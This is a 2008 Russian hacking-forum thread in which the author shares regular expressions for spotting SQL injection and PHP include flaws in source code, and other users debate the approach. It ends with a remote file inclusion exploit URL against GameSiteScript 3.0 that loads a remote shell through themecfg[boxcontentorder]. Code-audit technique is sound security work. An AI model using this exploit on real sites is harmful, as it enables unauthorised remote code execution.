Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Использование регулярных выражений при поиске уязвимостей php (https://forum.antichat.xyz/showthread.php?t=61407)

Macro 09.02.2008 22:51

Использование регулярных выражений при поиске уязвимостей php
 

Поиск уязвимостей с помощью регулярных выражений.

Поиском уязвимостей в php скриптах заниматься часто не столько сложно, сколько долго и нудно.
Хочу предложить вам более удобный и практичный, а главное, гораздо более быстрый способ поиска уязвимостей в скриптах,
нежели тупой пофайловый просмотр кода через текстовые редакторы и трение глаз о монитор или тыкание кавычек во все подряд переменные в браузере.
Я говорю о поиске наиболее известных уязвимостей с помощью регулярных выражений.
Конечно, 100% результата в качестве уязвимостей вы не получите, но существенно облегчите себе работу.
Итак, начнем.

1. Чем искать

Поискав в интернете, я наткнулся на замечательную программу от SilverAge Software, а именно TextWorkBench
http://blacktoad.info/ok/textworkbench_1.jpg

Она является платной, однако, что меня приятно удивило, позволяет работать, хоть и с ограничением функциональности,
но выполняя некоторые нам необходимые вещи даже после окончания 15-дневного демо-периода.

Скачать: http://silveragesoftware.com/ftp/HFF...benchSetup.exe На момент написания сайт производителя в дауне, надеюсь, что это не навечно...

Залил textworkbench на хост, т.к. сайт производителя висит
Скачать Text Workbench

2. Как искать

Методом проб и ошибок были составлены следующие регулярные выражения (синтаксис которых подходит именно для этой программы) :

SQL injection

Вероятно, что бага есть (если в запросе встречается переменная GPC, редко когда встречается, к сожалению) :

Код:

{where}|{order by}|{sort by}|{group by}[`\s]*[^\$]*{['"]\.}?\{?\s*\$_{GET}|{POST}|{COOKIE}|{REQUEST}[^\s;]*
Маловероятно, что бага есть (это просто поиск запросов, в которых встречаются переменные, почти везде выдает тучу результатов, но баги попадаются гораздо реже)

Код:

{where}|{order by}|{sort by}|{group by}[`\s]*[^\$]*{['"]\.}?\{?\s*\$[^\s;]*

PHP include

Тут все гораздо проще :)

Вероятно, что бага есть (GPC переменная входит в инклуд) :

Код:

{include}|{require}|{include_once}|{require_once}\s*\(?[^\$;]*\$_{GET}|{POST}|{COOKIE}|{REQUEST}[^;]+;
Менее вероятно, что бага есть (когда в инклуд входит переменная) :

Код:

{include}|{require}|{include_once}|{require_once}\s*\(?[^\$;]*\$[^;]+;
3. Пример

В качестве скрипта для примера возьму GameSiteScript 3.0

Скачать и посмотреть описание можно тут

Вводим поиск на маловероятный php include :)

Код:

{include}|{require}|{include_once}|{require_once}\s*\(?[^\$;]*\$[^;]+;
И смотрим результаты...

Вот один из них

http://blacktoad.info/ok/primer.jpg

Смотрим код файла
\plugins\site\themes\21\smallbox.php

PHP код:

<?php

$menunames 
explode("|"$themecfg['boxcontentorder']);

echo 
"<tr>";
$i 0;
foreach (
$menunames as $menuname) {
    if (
$i%2==&& $i!=0) {
        echo 
"</tr><tr>";
    }

    include 
$menuname."box.php";

    
$i++;

}
echo 
"</tr>";

?>


Это значит, что при register_globals on мы можем задать через GET или POST переменную $themecfg['boxcontentorder'], которая потом будет использоваться при инклуде.


Итог: найдена новая RFI уязвимость

Код:

http://site/gamesitescript/plugins/site/themes/21/smallbox.php?themecfg[boxcontentorder]=http://shell?

PS к сожалению форум все еще добавляет пробелы в код, поэтому не забывайте их удалять перед использованием.

Digimortal 09.02.2008 23:27

имхо такими методами ты пропустишь больше уязвимостей чем найдешь.. а еще ложные срабатывания..

проще уже весь сорс взять и изучить..
очень удобно, кстати, использовать редактор с развитой подсветкой синтаксиса - выделяешь в нем ярким цветом потенициально опасные функции и т.п., и при беглом осмотре они сразу бросаются в глаза.. а там уже разбираешься.. )

Macro 09.02.2008 23:45

Цитата:

Сообщение от Digimortal
имхо такими методами ты пропустишь больше уязвимостей чем найдешь.. а еще ложные срабатывания..

проще уже весь сорс взять и изучить..

Изучи-ка сорс эдак в 5 мб.... Кроме того, я же не говорил, что это единственный адекватный способ поиска багов. Если баги так не нашлись - мозги и notepad++ в руки - и изучать дальше. Но в большинстве случаев достаточно лишь грамотного регулярного выражения. Поэтому я и представил тут способ как сильно себе облегчить поиск уязвимостей.

Talisman 09.02.2008 23:47

+1 я опасные функции подсвечиваю

Macro 10.02.2008 00:02

Залил textworkbench на хост, т.к. сайт производителя висит
Скачать Text Workbench

Digimortal 10.02.2008 00:10

>> Изучи-ка сорс эдак в 5 мб....

если будет необходимо, то почему бы и нет? ))

>> Поэтому я и представил тут способ как сильно себе облегчить поиск уязвимостей.

ну, это боян еще тот.. и его тут по-моему уже не раз успели представить.. )

зачем тут тебе пригодилась шареваре-программка от славы васильева мне вообще непонятно - проще уж все это в виде собственного скрипта реализовать (хотя подобных уже итак дофига есть)..

Macro 10.02.2008 00:15

Цитата:

Сообщение от Digimortal
>> Изучи-ка сорс эдак в 5 мб....

если будет необходимо, то почему бы и нет? ))

>> Поэтому я и представил тут способ как сильно себе облегчить поиск уязвимостей.

ну, это боян еще тот.. и его тут по-моему уже не раз успели представить.. )

зачем тут тебе пригодилась шареваре-программка от славы васильева мне вообще непонятно - проще уж все это в виде собственного скрипта реализовать (хотя подобных уже итак дофига есть)..

ПОчему бы и нет? Потому что умереть успеешь быстрее.

Из подобного видел только php bug scanner by Razor, но там несколько иначе. Не видел ничего подобного нигде. Покажи.

Программка имхо одна из самых лучших помощников программиста. Реализовать в виде скрипта может и проще, но не дает свободы действий. Кроме того, смысл писать то, что уже реализовано в приличном варианте?

Talisman 10.02.2008 00:32

обычно сорсы много весят из-за картинок :) а сами сценарии не такие уж и тяжелые.

Alexsize 10.02.2008 00:39

Цитата:

Сообщение от Talisman
обычно сорсы много весят из-за картинок :) а сами сценарии не такие уж и тяжелые.

Ты битрикс никогда не ковырял например?

DIAgen 10.02.2008 00:43

Цитата:

Сообщение от Alexsize
Ты битрикс никогда не ковырял например?

Ящик пива, блок сигарет, и за работу:)


---Скорее уж веревку мыло и в туалет
Alexsize


Время: 14:14